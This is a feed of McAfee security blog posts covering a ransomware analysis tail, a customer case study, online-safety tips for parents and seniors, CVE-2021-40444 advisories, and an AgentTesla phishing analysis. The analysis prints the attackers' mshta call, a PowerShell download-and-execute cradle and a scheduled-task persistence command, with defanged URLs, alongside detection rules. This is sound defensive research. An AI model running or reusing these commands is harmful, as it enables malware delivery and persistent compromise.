It is important to keep your McAfee Enterprise products updated to the latest detections and avoid insecure remote desktop connections, maintain secure passwords that are changed on a regular basis, take precautions against phishing emails, and do not connect unnecessary devices to the enterprise network.

Despite some effective coding, mistakes have been made by the developers, allowing the program to be read, and a vaccine to be created, though we will stress again that it can affect other programs and is not a permanent solution and should be employed only if you accept the risks associated with it.

The post BlackMatter Ransomware Analysis; The Dark Side Returns appeared first on McAfee Blogs.

European Telecom Company Expands Its Footprint to Better Protect Users and Customers Wed, 22 Sep 2021 14:00:58 +0000

Hyper-growth and a determination to stand above the crowd compelled a popular Eastern European telecom to upgrade its trusty McAfee...

The post European Telecom Company Expands Its Footprint to Better Protect Users and Customers appeared first on McAfee Blogs.


Hyper-growth and a determination to stand above the crowd compelled a popular Eastern European telecom to upgrade its trusty McAfee Enterprise security infrastructure, which they relied on for many years to protect their 8,000 corporate endpoints. Competitive pressure to keep costs low and cybercriminals at bay for both their internal users and their customers spurred the mobile and fixed telephony company to enhance their existing security architecture with the latest endpoint and cloud-based protections from McAfee Enterprise.

The integrated McAfee Enterprise approach—with ePolicy Orchestrator ( ePO™) at the helm as the single-pane-of-glass management hub—enabled the security architect to build out a strong security foundation, with McAfee Enterprise endpoint and data protection solutions and Microsoft Defender as the mainstays of the telecom’s line of defense.

With ransomware and other advanced threats grabbing headlines, the telecom company felt a pressing need to upgrade its McAfee Enterprise infrastructure and expand its on-premises endpoint protection to cloud-based McAfee Enterprise Endpoint Security. The organization also added MVISION™ Endpoint Threat Detection and Response (MVISION® EDR) and deployed two McAfee Enterprise Advanced Threat Defense appliances for dynamic and static sandboxing. These deployments were easily integrated into the telecom’s existing security architecture—with all solutions managed by McAfee Enterprise ePO software. 

Faster time to detection, investigation, and remediation

McAfee Enterprise Endpoint Security was instrumental in both simplifying and boosting endpoint protection, as multiple technologies—Threat Protection, Firewall, Web Control, and Adaptive Threat Prevention—are consolidated into a single agent. Leveraging threat data from local endpoints and McAfee Enterprise Global Threat Intelligence in the cloud, the telecom’s security team is also empowered to detect zero-day threats in near real time. When a threat is identified on a given endpoint, that information is automatically shared with all the other endpoints. And when an unknown or suspicious file is detected, it is immediately quarantined for analysis by MVISION EDR or the McAfee Endpoint Advanced Threat Defense sandbox.

Investigation had once been a lengthy and laborious manual process, often taking days or weeks. Sometimes detections of malicious activity were even ignored due to time constraints. But, after implementing MVISION EDR, things changed dramatically. Investigations and remediations now take as little as 10 to 15 minutes. The security team is catching more threats than ever before, their workflows are streamlined, and investigations are faster. Best of all, thanks to MVISION EDR, team members have expanded their threat-hunting capacity—without augmenting their staff.

Alerts coordinate with action

Because McAfee Enterprise Advanced Threat Defense appliances and MVISION EDR are integrated with McAfee Enterprise SIEM solutions and McAfee Enterprise ePO software, suspicious activity at an endpoint automatically triggers an investigation. Advanced analytics and artificial intelligence (AI) in MVISION enable administrators to understand the alert, sort out the facts, and remediate any threat. MVISION EDR does all the preparatory work, gathering and distilling relevant data, such as IP addresses and information about devices and users. Graphic visualizations and AI-guided investigations help analysts quickly get a grasp on what’s happening. The security team can also run real-time queries to see if something similar has occurred anywhere else, and they can conduct historical searches for greater context.

“The volume of malware we have to deal with has definitely shrunk since implementing McAfee Enterprise Endpoint Security. But the addition of MVISION EDR has made an even bigger impact on security posture. When our endpoints do encounter malware, we can now respond many times faster and more effectively than ever before,” points out the security architect.

Achieving a proactive stance

The enhanced McAfee Enterprise security architecture has transformed the telecom company’s approach to maintaining a more resilient security posture. The company is now taking a more proactive defense as a result of the new, fully coordinated McAfee Enterprise toolset.

In addition to advanced threat-hunting capabilities, the ability to share threat information across the organization via the Data Exchange Layer (DXL) has also contributed to a more proactive stance. For example, whenever a malicious file is identified, that information is automatically added to the McAfee Enterprise Threat Intelligence Exchange threat reputation database and shared with all DXL-connected systems: endpoints, SIEM, Advanced Threat Defense sandboxes, MVISION EDR software, and even the company’s Cisco pxGrid infrastructure, a multivendor, cross-platform network system that pulls together different parts of an IT infrastructure.

The European telecom company has plans to migrate to the cloud, beginning with Microsoft Office 365 and Microsoft Azure. For the time being, the organization plans to keep the McAfee Enterprise ePO management console on premises, but, in the very near future, the plan is to protect internet-only users with cloud-based MVISION ePO™.

“Taking measured steps to augment our security infrastructure has helped us succeed at keeping our company and customers secure,” say the security architect. “It’s nice to know that McAfee Enterprise can support us wherever we are in our journey and can extend our integrated security infrastructure from device to cloud when we’re ready.”


The post European Telecom Company Expands Its Footprint to Better Protect Users and Customers appeared first on McAfee Blogs.

“School Should Be Teaching Online Safety” says 80% of Aussie Parents Wed, 22 Sep 2021 13:51:43 +0000

Despite the old adage that it takes a village to raise a child, new research from McAfee shows that an...

The post “School Should Be Teaching Online Safety” says 80% of Aussie Parents appeared first on McAfee Blogs.


Despite the old adage that it takes a village to raise a child, new research from McAfee shows that an overwhelming majority (80%) of Aussies believe schools should be taking the lead in teaching our kids about online safety. 

At the time of the survey in April 2021, nearly 40% of Aussie households had at least one family member participating in online learning – a number that has most definitely increased in recent months as the Delta variant hit Australian shores causing many schools to shut.  

Aussies Worry about the Risks Online but Many Don’t Take Action 

But despite this turn of circumstances, nearly half (48%) of Aussies didn’t take any proactive security measures to protect their family/home when distance learning was introduced, with 34% saying they saw no increased risk to their children’s online safety. 

Now, here’s the interesting thing – these same respondents nominated in the same survey that they were extremely worried about their kids’ exposure to scams (43%), sharing personal information (43%), illegal content (35%), cyber-bullying (40%) and misinformation (31%). Confusing, I know! 

Aussies Believe Schools Should Be Teaching CyberSafety 

There’s no doubt that managing kids and home learning while trying to keep your day job and keep the household running is an extremely tough gig! In fact, I think thousands of Aussie parents will deserve medals after this chapter in our lives is over! But, I think these statistics aren’t just about being overwhelmed and a lack of energy – as 80% of surveyed Aussies nominated that they believe it is in fact the responsibility of schools to teach our kids how to be safe online. Only 8% considered cyber safety to be the responsibility of the parent. 

If there is anyone who gets just how intense family life can be it’s me! With four boys, 2 cats, a dog (and an action-orientated husband) to manage, I have spent years living in chaos! And I understand that it can often feel like a relief knowing that something can be outsourced or managed by someone else. But, when it comes to something as important as our kids’ online safety, it’s essential that we put that top of our list. Forget about the ironing and focus on your kids’ digital lives instead. I’ve been an advocate of letting body heat remove wrinkles for years! 

My Recommended Action Plan 

Even if your child’s school is teaching digital wellness, it’s imperative that these messages are also reinforced at home. Here’s what I recommend you do to get your family’s digital safety back on track: 

1. Device Check 

Ensure the devices your kids are using for school or homework have up-to-date software and security settings. Software updates are usually designed to address security weaknesses so using outdated software can be quite risky!

2. Password, Password, Passwords!! 

Using weak and default passwords is, without a doubt, one of the easiest ways to get into trouble online. Ensure your kids have complex passwords for EACH of their online accounts and devices. Passwords should contain numbers, special characters and both lower- and upper-case letters. I’m a big fan of a crazy sentence. Why not consider a password manager like McAfee’s free True Key to help them generate and remember their passwords – I know I couldn’t survive without mine!   

3. Use a Virtual Private Network (VPN) 

Why not consider using a VPN when your kids are accessing online learning services from home to protect the privacy of the internet connection? VPN’s use bank-grade level encryption to stop hackers from stealing personal information like passwords or data.   

4. Teach Personal Responsibility 

With both misinformation and disinformation a major concern for Aussie parents, it’s critical that us parents educate our kids about fake news: how to spot it and why they shouldn’t share it. Encouraging kids to question what they read or watch online before deciding whether it is to be believed and shared will help establish important digital critical thinking skills. 

5. Talk About Digital Safety and Wellness – whenever possible 

I’m a big fan of family dinners, even if it’s a humble bowl of spaghetti bolognese! In my opinion, it’s the perfect time to weave in messages of all types but particularly ones of a digital safety nature. Why not share stories of data breaches and what affected consumers had to do to prevent being hacked? Share news stories about new apps or scams, stories of kindness online, and digital citizenship you’ve witnessed online. Once you start sharing, you’ll likely find your kids want to share their stories too. But always keep calm and interested – otherwise they’ll stop talking!! 

As a mum of four and cybersafety ambassador, I believe that a village approach is the absolute best way of setting our kids up for safe and positive interactions online. So, if you’re feeling unsure about what to tell your kids, spend some time educating yourself. We are lucky enough to have a dedicated eSafety Commissioner here in Australia who has a plethora of resources for Aussie parents. Spend some time checking it out, I promise it will be worth it! 

Till next time, stay safe everyone! 

Alex xx 

The post “School Should Be Teaching Online Safety” says 80% of Aussie Parents appeared first on McAfee Blogs.

Malicious PowerPoint Documents on the Rise Wed, 22 Sep 2021 01:47:42 +0000

Authored by Anuradha M McAfee Labs have observed a new phishing campaign that utilizes macro capabilities available in Microsoft PowerPoint....

The post Malicious PowerPoint Documents on the Rise appeared first on McAfee Blogs.


Authored by Anuradha M

McAfee Labs have observed a new phishing campaign that utilizes macro capabilities available in Microsoft PowerPoint. In this campaign, the spam email comes with a PowerPoint file as an attachment. Upon opening the malicious attachment, the VBA macro executes to deliver variants of AgentTesla which is a well-known password stealer. These spam emails purport to be related to financial transactions.  

AgentTesla is a RAT (Remote Access Trojan) malware that has been active since 2014. Attackers use this RAT as MASS(Malware-As-A-Service) to steal user credentials and other information from victims through screenshots, keylogging, and clipboard captures. Its modus operandi is predominantly via phishing campaigns. 

During Q2, 2021, we have seen an increase in PowerPoint malware. 

Figure 1. Trend of PPT malware over the first half of 2021
Figure 1. The trend of PPT malware over the first half of 2021

In this campaign, the spam email contains an attached file with a .ppam extension which is a PowerPoint file containing VBA code. The sentiment used was finance-related themes such asNew PO300093 Order as shown in Figure 2. The attachment filename is 300093.pdf.ppam”. 

Figure 2. Spam Email

PPAM file: 

This file type was introduced in 2007 with the release of Microsoft Office 2007. It is a PowerPoint macro-enabled Open XML add-in file. It contains components that add additional functionality, including extra commands, custom macros, and new tools for extending default PowerPoint functions.  

Since PowerPoint supports ‘add-ins’ developed by third parties to add new features, attackers abuse this feature to automatically execute macros. 

Technical Analysis: 

Once the victim opens the “.ppam” file, a security notice warning pop-up as shown in Figure 3 to alert the user about the presence of macro.

Figure 3. Warning when opening the attached PowerPoint file
Figure 3. Warning when opening the attached PowerPoint file

From Figure 4, you can see that the Add-in feature of the PowerPoint can be identified from the content of [Content_Types].xml file which will be present inside the ppam file. 

Figure 4. Powerpoint add-in feature with macroEnabled
Figure 4. Powerpoint add-in feature with macroEnabled

 The PPAM file contains the following files and directories which can be seen upon extraction. 

  • _rels\.rels 
  • [Content_Types].xml 
  • ppt\rels\presentation.xml.rels 
  • ppt\asjdaaasdasdsdaasdsdasasdasddoasddasasddasasdsasdjasddasdoasjdasasddoajsdjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.bin – Malicious file 
  • ppt\presentation.xml 

Once the victim enables the macro, the add-in gets installed silently without user knowledge, which can be seen in Figure 5. On seeing that there is no content and no slide in the PowerPoint, the user will close the file but, in the backend, macro code gets executed to initiate the malicious activity. 

Figure 5. Installed Add-ins in the PowerPoint options
Figure 5. Installed Add-ins in the PowerPoint options

As you can see in Figure 6, the macro is executed within the add-in auto_open() event i.e.., macro is fired immediately after the presentation is opened and the add-in is loaded. 

Figure 6.VBA Code snippet with auto_open() event
Figure 6.VBA Code snippet with auto_open() event

The PowerPoint macro code on execution launches an URL by invoking mshta.exe (Microsoft HTML Application) which is shown in Figure 7. The mshta process is launched by Powerpoint by calling the CreateProcessA() API. 

Below are the parameters passed to CreateProcessA() API: 

kernel32.CreateProcessA(00000000,mshta hxxps://,00000000,00000000,00000001,00000020,00000000,00000000,D, 

Figure 7. VBA Code snippet containing mshta and url
Figure 7. VBA Code snippet containing mshta and url

Below is the command line parameter of mshta: 

mshta hxxps:// 

The URL hxxps:// is redirected to “hxxps://p8hj[.]blogspot[.]com/p/27.html” but it didn’t get any response from “27.html” at the time of analysis. 

Later mshta.exe spawns powershell.exe as a child process. 

Below is the command line parameters of PowerShell: 

powershell.exe - ”C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” i’E’x(iwr(‘hxxps://‘) -useB);i’E’x(iwr(‘hxxps://‘) -useB);i’E’x(iwr(‘hxxps://‘) -useB); 

PowerShell downloads and executed script files from the above-mentioned URLs.  

The below Figure 8 shows the content of the first url – “hxxps://”: 

Figure 8. Binary file content
Figure 8. Binary file content

There are two binary files stored in two huge arrays inside each downloaded PowerShell file. The first file is an EXE file that acts as a loader and the second file is a DLL file, which is a variant of AgentTesla. PowerShell fetches the AgentTesla payload from the URLs mentioned in the command line, decodes it, and launches MSBuild.exe to inject the payload within itself. 

Schedule Tasks: 

To achieve persistence, it creates a scheduled task in “Task Scheduler” and drops a task file under C:\windows\system32\SECOTAKSA to make the entire campaign work effectively.   

Figure 9. Code snippet to create a new schedule task
Figure 9. Code snippet to create a new scheduled task

The new task name is SECOTAKSA”. Its action is to execute the command mshta hxxp:// //” and it’s called every 80 minutes.  

Below is the command line parameters of schtasks: 

schtasks.exe - “C:\Windows\System32\schtasks.exe” /create /sc MINUTE /mo 80 /tn “”SECOTAKSA”” /F /tr “”\””MsHtA””\””hxxp://\“” 

Infection Chain: 

Figure 10. Infection Chain
Figure 10. Infection Chain

Process Tree: 

Figure 11. Process Tree
Figure 11. Process Tree


McAfee’s Endpoint Security (ENS) and Windows Systems Security (WSS) product have  DAT coverage for this variant of malware. 

This malicious PPAM document with SHA256: fb594d96d2eaeb8817086ae8dcc7cc5bd1367f2362fc2194aea8e0802024b182 is detected as “W97M/Downloader.dkw”.  

The PPAM document is also blocked by the AMSI feature in ENS as AMSI-FKN! 

Additionally, the Exploit Prevention feature in McAfee’s Endpoint Security product blocks the infection chain of this malware by adding the below expert rule so as to protect our customers from this malicious attack. 

Expert Rule authored based on the below infection chain: 

POWERPNT.EXE –> mshta.exe  

Expert Rule: 

Rule { 

  Process { 

    Include OBJECT_NAME { -v “powerpnt.exe” } 


  Target { 

    Match PROCESS { 

       Include OBJECT_NAME { -v “mshta.exe” } 

       Include PROCESS_CMD_LINE { -v “**http**” } 

       Include -access “CREATE” 







hxxp:// // 





EML files: 





PPAM files: 






Extracted AgentTesla files: 



The post Malicious PowerPoint Documents on the Rise appeared first on McAfee Blogs.

McAfee Enterprise Defender Blog | MSHTML CVE-2021-40444 Mon, 20 Sep 2021 15:48:54 +0000

Threat Summary Microsoft is warning its users of a zero-day vulnerability in Windows 10 and versions of Windows Server that...

The post McAfee Enterprise Defender Blog | MSHTML CVE-2021-40444 appeared first on McAfee Blogs.


Threat Summary

Microsoft is warning its users of a zero-day vulnerability in Windows 10 and versions of Windows Server that is being leveraged by remote, unauthenticated attackers to execute code on the target system using specifically crafted office documents. Tracked as CVE-2021-40444 (CVSS score: 8.8), the remote code execution flaw is rooted in MSHTML (aka Trident), a proprietary browser engine for the now-discontinued Internet Explorer and which is used in Microsoft Office to render web content inside Word, Excel, and PowerPoint documents. This vulnerability is being actively exploited and protections should be put into place to prevent that. Microsoft has released guidance on a workaround, as well as updates to prevent exploitation, but below are additional McAfee Enterprise countermeasures you can use to protect your business.

MVISION Insights Campaign – “CVE-2021-40444 – Microsoft MSHTML Remote Code Execution Vulnerability”

Since originally reported, vulnerability exploitation has grown worldwide.

Figure 1. Latest MITRE ATT&CK framework for Exploitation of CVE-2021-40444. Source: MVISION Insights

Additional MITRE ATT&CK techniques have been identified since our original report. MVISION Insights will be regularly updated with the latest IOCs and hunting rules for proactive detection in your environment.

Figure 2. Latest MITRE ATT&CK framework for Exploitation of CVE-2021-40444. Source: MVISION Insights

McAfee Enterprise Product Protections

The following McAfee Enterprise products can protect you against this threat.

Figure 3. Protection by ENS Module

For ENS, it’s important to have both Threat Protection (TP) and Adaptive Threat Protection (ATP) with GTI enabled. We are seeing 50% of detections based on ATP behavior analysis rules.

Figure 4. Protection by ENS Module

More details on Endpoint protection including MVISION EDR are included below.

Preventing Exploit with McAfee ENS

McAfee Global Threat Intelligence (GTI) is currently detecting the analyzed IOCs for this exploitation. GTI will be continually updated as new indicators are observed in the wild.

ENS Threat Prevention module can provide added protections against exploitation of CVE-2021-40444 until a patch is deployed. The following signature in Exploit Prevention has shown coverage in testing of observed exploits; this signature could cause false positives, so it is highly advised to test in Report Mode or in sandbox environments before blocking in production environments.

Signature 2844: Microsoft Word WordPerfect5 Converter Module Buffer Overflow Vulnerability

Several custom Expert Rules can be implemented to prevent or detect potential exploitation attempts. As with all Expert Rules, please test them in your environment before deploying widely to all endpoints. Recommended to implement this rule in a log only mode to start.

Figure 5. Expert Rule to block or log exploitation attempts

Figure 6. Expert Rule to block or log exploitation attempts

ATP Rules

Adaptive Threat Protection module provides behavior-blocking capability through threat intelligence, rules destined to detect abnormal application activity or system changes and cloud-based machine-learning. To exploit this vulnerability, the attacker must gain access to a vulnerable system, most likely through Spearphishing with malicious attachments. These rules may also be effective in preventing initial access and execution. It is recommended to have the following rules in Observe mode at least and monitor for threat events in ePO.

  • Rule 2: Use Enterprise Reputations to identify malicious files.
  • Rule 4: Use GTI file reputation to identify trusted or malicious files
  • Rule 5: Use GTI file reputation to identify trusted or malicious URLs
  • Rule 300: Prevent office applications from being abused to deliver malicious payloads
  • Rule 309: Prevent office applications from being abused to deliver malicious payloads
  • Rule 312: Prevent email applications from spawning potentially malicious tools

As with all ATP Rules, please test them in your environment before deploying widely to all endpoints or turning on blocking mode.

Utilizing MVISION EDR for Hunting of Threat Activity

The Real-Time Search feature in MVISION EDR provides the ability to search across your environment for behavior associated with the exploitation of this Microsoft vulnerability. Please see the queries to locate the “mshtml” loaded module associated with various application processes.

EDR Query One

Processes where Processes parentimagepath matches “winword|excel|powerpnt” and Processes cmdline matches “AppData\/Local\/Temp\/|\.inf|\.dll” and Processes imagepath ends with “\control.exe”

EDR Query Two

HostInfo hostname and LoadedModules where LoadedModules process_name matches “winword|excel|powerpnt” and LoadedModules module_name contains “mshtml” and LoadedModules module_name contains “urlmon” and LoadedModules module_name contains “wininet

Additionally, the Historical Search feature within MVISION EDR will allow for the searching of IOCs even if a system is currently offline.

Figure 7. Using Historical Search to locate IOCs across all devices. Source: MVISION EDR

McAfee Enterprise has published the following KB article that will be updated as more information and coverage is released.

McAfee Enterprise coverage for CVE-2021-40444 – MSHTML Remote Code Execution

Further Protection for Threat Actor Behavior After Exploitation

Since public disclosure of the vulnerability, it has been observed from successful exploitation of CVE-2021-40444 in the wild that threat actors are utilizing a Cobalt Strike payload to then drop ransomware later in the compromised environment. The association between this vulnerability and ransomware point to the possibility that the exploit has been added to the tools utilized in the ransomware-as-a-service (RaaS) ecosystem.

Figure 8. CVE-2021-40444-attack-chain (Microsoft)​​

The Ransomware Gangs that have been observed in these attacks have in the past been known to utilize the Ryuk and Conti variants of ransomware.

Please see below additional mitigations that can be utilized in the event your environment is compromised and added protections are needed to prevent further TTPs.

Cobalt Strike BEACON

MVISION Insights Campaign – Threat Profile: CobaltStrike C2s


Endpoint Security – Advanced Threat Protection:

Rule 2: Use Enterprise Reputations to identify malicious files.

Rule 4: Use GTI file reputation to identify trusted or malicious files

Rule 517: Prevent actor process with unknown reputations from launching processes in common system folders


Ryuk Ransomware Protection

MVISION Insights Campaign – Threat Profile: Ryuk Ransomware


Endpoint Security – Advanced Threat Protection:

Rule 2: Use Enterprise Reputations to identify malicious files.

Rule 4: Use GTI file reputation to identify trusted or malicious files

Rule 5: Use GTI file reputation to identify trusted or malicious URLs


Endpoint Security – Access Protection:

Rule: 1

Executables (Include):



Subrule Type: Files



Targets (Include):



Endpoint Security – Exploit Prevention

Signature 6153: Malware Behavior: Ryuk Ransomware activity detected


Conti Ransomware Protection

MVISION Insights Campaign – Threat Profile: Conti Ransomware


Endpoint Security – Advanced Threat Protection:

Rule 2: Use Enterprise Reputations to identify malicious files.

Rule 4: Use GTI file reputation to identify trusted or malicious files

Rule 5: Use GTI file reputation to identify trusted or malicious URLs


Endpoint Security – Access Protection Custom Rules:

Rule: 1

Executables (Include):



Subrule Type: Files



Targets (Include):



Endpoint Security – Exploit Prevention

Signature 344: New Startup Program Creation

The post McAfee Enterprise Defender Blog | MSHTML CVE-2021-40444 appeared first on McAfee Blogs.

The Bug Report | September 2021: CVE-2021-40444 Fri, 17 Sep 2021 10:07:22 +0000 How to check for viruses

Why am I here? There’s a lot of information out there on critical vulnerabilities; this short bug report contains an...

The post The Bug Report | September 2021: CVE-2021-40444 appeared first on McAfee Blogs.

How to check for viruses

Why am I here?

There’s a lot of information out there on critical vulnerabilities; this short bug report contains an overview of what we believe to be the most news and noteworthy vulnerabilities. We don’t rely on a single scoring system like CVSS to determine what you need to know about; this is all about qualitative and experience-based analysis, relying on over 100 years of combined industry experience within our team. We look at characteristics such as wormability, ubiquity of the target, likelihood of exploitation and impact. Today, we’ll be focusing on CVE-2021-40444.

CrossView: CVE-2021-40444

What is it?

CVE-2021-40444 is a vulnerability in Office applications which use protected view such as Word, PowerPoint and Excel which allows an attacker to achieve remote code execution (RCE). CVE-2021-40444 is a vulnerability which allows a carefully crafted ActiveX control and a malicious MS Cabinet (.cab) file to be launched from an Office document

Most importantly, this vulnerability impacts the applications themselves, as well as the Windows Explorer preview pane.

Who cares?

This is a great question! Pretty much anyone who uses any Microsoft Office applications, or has them installed, should be concerned.

Office is one of the most widely-used applications on the planet. Odds are good you have it open right now. While many companies have disabled macros within Office documents at the Group Policy level, it is unlikely ActiveX is treated similarly. This means that without proper data hygiene, a large proportion of Office users will be vulnerable to this exploit.

Fortunately, “spray and pray” style email campaigns are unlikely to gain traction with this exploit, as mail providers have started flagging malicious files (or at least known PoCs) as potential malware and removing them as attachments.

What can I do?

Good news! You aren’t necessarily completely helpless. By default, Windows uses a flag known as the “Mark of the Web” (MoTW) to enable Protected Mode in Office. Email attachments, web downloads, and similar all have this MoTW flag set, and Protected Mode prevents network operations, ActiveX controls, and macros embedded within a document from being executed, which effectively disables exploitation attempts for this vulnerability.

That said, users have become so inured to the Protected View message, they often dismiss it without considering the consequences. Much like “confirmation fatigue” can lead to installing malicious software, attackers can leverage this common human response to compromise the target machine.

Even more so, while exploitation can occur via the Office applications themselves and via the Explorer preview pane, the Outlook preview pane operates in a completely different manner which does not trigger the exploit. Exactly why this distinction exists only MS can explain, but the upshot is that Outlook users have to explicitly open malicious files to be exploited – the more hoops users have to jump through to open a malicious, the less likely they are to be pwned.

If I’m protected by default, why does this matter?

It depends entirely on how the file gets delivered and where the user saves it.

There are many ways of getting files beyond email and web downloads – flash cards for cameras, thumb drives, external hard drives, etc. Files opened from these sources (and many common applications[1]) don’t have MoTW flag set, meaning that attackers could bypass the protection entirely by sending a malicious file in a .7z archive, or as part of a disk image, or dropping a USB flash drive in your driveway. Convincing users to open such files is no harder than any other social engineering strategy, after all.

Another fun workaround for bypassing default protections is to make use of an RTF file – emailed, downloaded, or otherwise. From our testing, an RTF file saved from an email attachment does not bear the MoTW but can still be used as a vector of exploitation. Whether RTF files become the preferred option for this exploit remains to be seen.


Ha! We put the tl;dr near the end, which only makes sense when the information above is so important it’s worth reading. But if all you care about is what you can actively do to ensure you’re not vulnerable, this section is for you.


  • Apply the Patch! Available via Windows Update as of 9/14/2021, this is your best solution.
  • Enable registry workaround to disable ActiveX – details can be found on Microsoft’s bulletin page and should effectively disable exploitation attempts until a formal patch can be applied.
  • Confirm that Windows Explorer “Preview” pane is disabled (this is true by default). This only protects against the Preview pane exploitation in Explorer. Opening the file outside of Protected Mode (such as an RTF file) or explicitly disabling Protected Mode will still allow for exploitation.

The Gold Standard

In case you simply can’t apply the patch or have a “production patch cycle” or whatever, McAfee Enterprise has you covered. Per our KB we provide comprehensive coverage for this attack across our protection and detection technology stack of endpoint (ENS Expert Rules), network (NSP) and EDR.

[1] 7zip, files from disk images or other container formats, FAT formatted volumes, etc.

The post The Bug Report | September 2021: CVE-2021-40444 appeared first on McAfee Blogs.

How to Help Seniors Spot Online Job Scams Fri, 17 Sep 2021 02:13:07 +0000

Sadly, online job scams targeting older adults have been an issue for years. However, in a pandemic job market, cybercriminals are working overtime...

The post How to Help Seniors Spot Online Job Scams appeared first on McAfee Blogs.


Sadly, online job scams targeting older adults have been an issue for years. However, in a pandemic job market, cybercriminals are working overtime to devise schemes that exploit job seekers’ need for financial security.  

According to the Better Business Bureau, Americans lost more than $62 million in employment scams in 2020. In addition, with federal unemployment benefits ending this month, that number is expected to rise as more people head online to look for work.    

Online hiring scams can be hard to detect because scammers advertise job opportunities the same way legitimate employers do—via online ads, job sites, and popular social networking channels. They promise job seekers opportunity and hope but are carefully designed to the applicant’s personal information or deceive them into sending money. 

Online Hiring Scams 

Here are just a few examples of online jobs scams targeting older adults and a few ways to avoid becoming a victim.   

Bogus LinkedIn job offers 

Last year the Federal Trade Commission (FTC) identified and shut down a scam on LinkedIn in which a company sent potential job candidates a direct message promising a high-paying job still unpublished to the public. The catch? Potential candidates were asked to pay a fee of up to $2,500 to set up the interview. Variations of this scam, using LinkedIn as a channel, may be in play. 

Fraudulent employers 

Some scammers are getting especially bold and posting job openings using the names, logos, and even staff names from legitimate companies to lure unsuspecting job seekers into fake interviews. After a questionnaire or interview, the company informs the applicant they have the job. From there, they collect personal information as if it’s part of a legitimate onboarding process—only the job doesn’t exist. 

Work-from-home scams 

A popular scam involves a company offering job seekers a six-figure income working from home with the promise you can “be your own boss “and “set your own schedule.” The catch: Job seekers must first purchase a starter kit or some form of online coaching package to qualify for the “opportunity.” After that, the company can disappear or charge the consumer thousands of dollars more for training that never comes. 

Identity theft 

According to the BBB, some scams include job seekers submitting personal information to potential employers only to have that information stolen and used for fraudulent schemes. Some scams even involve online interviews that appeared legitimate; only the interviewer didn’t appear on camera. The bogus employer asks for personal data during the interview, including banking information needed for direct depositing a paycheck. 

Spot & Stop a Scam 

Awkward hiring process 

If an employer attempts to hire you by text, email, or a photo-only video interview, beware. Legitimate employers, no matter how small, will have a professional hiring process. Job Search Safety Tips: 1) Call the company to make sure the job offer is legitimate. 2) Verify the name of the company contact through LinkedIn and verify the person with whom you are communicating  3) Consider comprehensive security software to protect your devices from malware sent via phishing emails from potential employers.  

Request for money 

A legitimate employer will not ask for money from a potential or new hire. Nor will they ask you to purchase “training” or cash a check for “software” as part of your employment. Job Search Safety Tip: Check the BBB’s Scam Tracker for scams connected to a company.  

Checks exchanged 

If an employer sends you a cashier’s check or even a corporate check, know it may not be real, even if your bank accepts it for a deposit (it won’t clear). Various fake check scams can pull in unwitting victims through job posts that advertise positions for merchandise resellers, virtual assistants, mystery shoppers, car wrappers, caregivers, and photographers.  

Request for personal financial info

If an employer immediately asks for personal data such as your SSN, birthdate, driver’s license number, etc., chances are it’s a scam. Job Search Safety Tip: 1) Bank-routing information is for direct deposits after you’ve met an employer in person. If you are applying for remote work, wait for a signed offer, be sure to verify the company and the offer before sharing financial information. 2) Consider using a Virtual Private Network, to share any kind of private information regarding employment.  

Urgency and pushiness

Job scammers target people who are stressed and desperate for work. If the potential employer seems to be pushing you to give information, send money, or take the next step, it may be a scam. Job Search Safety Tip: Slow down and ask yourself, “Does this sound right?” Seek out the opinion of a friend or relative if needed.  

Resources for Seniors

Stay informed 

Need guidance? Call the AARP Fraud Watch Network helpline toll-free at 877-908-3360. Stay aware of scams targeting seniors at 

Report job fraud

If you are the victim of a scam or attempted scam, report it to the FTC,IC3, FBI, and 

Finally, remember that legitimate job boards such as Indeed, Monster, and LinkedIn can contain fake companies, bogus jobs, and positions that look incredible that will cause incredible heartache for a job seeker that forges ahead without caution.    

The post How to Help Seniors Spot Online Job Scams appeared first on McAfee Blogs.

Top 10 COVID-19 Scams: How to Stay Protected Thu, 16 Sep 2021 13:27:55 +0000

The COVID-19 pandemic flipped the world on its head in so many ways. Offices and schools stood empty while living...

The post Top 10 COVID-19 Scams: How to Stay Protected appeared first on McAfee Blogs.


The COVID-19 pandemic flipped the world on its head in so many ways. Offices and schools stood empty while living rooms were transformed into classrooms and workspaces. Misinformation ran rampant and made people unsure of what to believe. Cybercriminals took advantage of the confusion and new way of daily life, giving rise to many COVID-19 scams. 

Luckily, when armed with the facts, you can sidestep scams and keep your personal information safe from cybercriminals. Here’s a list of the top 10 COVID-19 scams you should keep an eye on plus tips on how to avoid each and help you navigate the current landscape and the future with confidence. 

1. Vaccination Card Counterfeiting

Finally getting your COVID-19 vaccine is an exciting occasion. Many people’s first reaction to exciting news is to share it with their extended networks on social media. There was a trend going around where people were posting pictures of their vaccination cards. Little did they know, vaccination cards hold a trove of valuable information (name, birth dates, vaccination location, and dates) that can be used to create counterfeit vaccination cards.  

Additionally, the information on vaccination cards can be paired together with other details from your social media profile to steal your identity. Consider altering the privacy settings on your social media profiles so it is only visible to people you know. If you’d like additional peace of mind that your identity is safe, McAfee Identity Theft Protection Plus provides up to $1 million in identity theft insurance and restoration assistance.

2. General Misinformation Spreading

Some of the false claims about COVID-19 circulating on social media are outrageous, such as 5G aiding the spread of the virus and eating garlic as a preventive measure. Cybercriminals might not have been the origin of false claims, but they certainly benefit from the chaos created by misinformation. They capitalize on commonly held fears by swooping in with cure-alls that swindle money from concerned people. 

Be a source of truth for your social media following. The Centers for Disease Control and Prevention, the National Health Service, and the World Health Organization can be trusted for up-to-date resources concerning COVID-19, the vaccine, and how to remain healthy. 

3. Hazardous Online Miracle Cures 

To firmly and quickly debunk this myth right now: There are no COVID-19 miracle cures. The best way to protect your and your loved one’s health is to receive a CDC-approved vaccination from a medical institution. Any homemade online treatment claiming to cure the disease is a hoax to steal money. Also, healing potions purchased online could be hazardous to your health, as in the case of one fraudulent operation in Florida. A Florida family sold a bleach solution that swindled $1 million and left many people hospitalized. 

For the latest news about COVID-19 treatment, preventive measures, and the vaccine, refer to the CDC or WHO.

4. Stimulus CheckScams

Various stimulus check scams were swirling around in early 2021. Scammers impersonating government workers contacted citizens by phone, text, and email asking them to verify personal information or to pay fees to receive their checks. 

